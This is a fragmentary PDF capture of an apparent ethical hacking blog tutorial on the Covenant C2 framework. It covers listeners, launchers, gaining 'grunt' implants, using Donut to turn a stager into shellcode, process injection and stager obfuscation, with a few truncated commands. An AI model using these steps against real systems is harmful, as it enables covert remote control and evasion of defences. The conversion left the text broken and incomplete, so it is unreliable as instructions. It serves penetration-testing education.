Professional Documents
Culture Documents
A New PowerShell Empire - The Covenant C2 Tutorial
A New PowerShell Empire - The Covenant C2 Tutorial
TRENDING: How I Use Cobra For Easy Golang CLI Flags SEARCH
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 2/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
Table of Contents
1. Here’s What You Need
2. Installation
3. Docker Installation
4. Adding Encryption
5. Listeners
6. Launchers
7. Getting a Grunt
8. Interacting with Grunts
9. Use Covenant for Priv Escalation
10. Grunt Taskings
11. How to Use Donut with Covenant
12. Use Donut 0.9.3
13. Alternatives To Compiling Donut
14. Inject A Covenant Stager PIC
15. How To Obfuscate Grunt Stagers
16. How To Import PowerShell Into Covenant
17. How To Use Covenant With Evil-WinRM
INSTALLATION
The rst step to install Covenant is to
download the dotnet-sdk.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 4/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
DOCKER INSTALLATION
If you are inclined to you can install Covenant
using the Docker image although I don’t nd
the normal installation to be very di cult.
ADDING ENCRYPTION
Covenant connections are encrypted by
default. Let me say that again, by default
network tra c from Covenant is encrypted.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 5/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
LISTENERS
Covenant listeners are the con gured
listening interfaces for Covenant to phone
back home to once its grunts are active.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 6/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
LAUNCHERS
In the Covenant architecture launchers are
used to create grunts. They launch attacks
on the targets.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 7/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
GETTING A GRUNT
In order to get a grunt I copied the generated
PowerShell launcher command and hosted it
on a Python webserver on my Kali VM.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 8/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
it immediately.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 9/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
GRUNT TASKINGS
The Grunt Taskings tab shows the requested
tasks given to grunts.
Step 1.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 10/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
Step 2.
Step 3.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 11/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
Step 2.
Step 3.
donut.exe -f GruntStager.exe -a 2
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 12/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
loader.exe instance
ALTERNATIVES TO COMPILING
DONUT
Instead of compiling Donut and deciding
which version to use there is a convenient
method for creating PIC called donut-
maker.py.
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 13/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
PS C:\Users\bob.bob> [System.Conv
C:\Users\bob.bob\source\repos\G
"C:\Program Files\Internet
Explorer\iexplore.exe" 2624
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 14/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
python3 obfuscate.py
gruntstager.cs
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 15/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 16/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 17/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 18/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
SHARE THIS:
Twitter Reddit
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 19/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
LIKE THIS:
Like
SHARE:
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 20/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 21/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
RATE:
PREVIOUS
NEXT
How to Exploit WordPress
without Metasploit DC: 9 Vulnhub Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 22/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
TEHG
RELATED POSTS
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 23/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
November 19,
2019
April 4, 2019 February 9, 2020
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 24/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
© 2021 ethicalhackingguru.com
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 25/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 26/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 27/28
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 28/28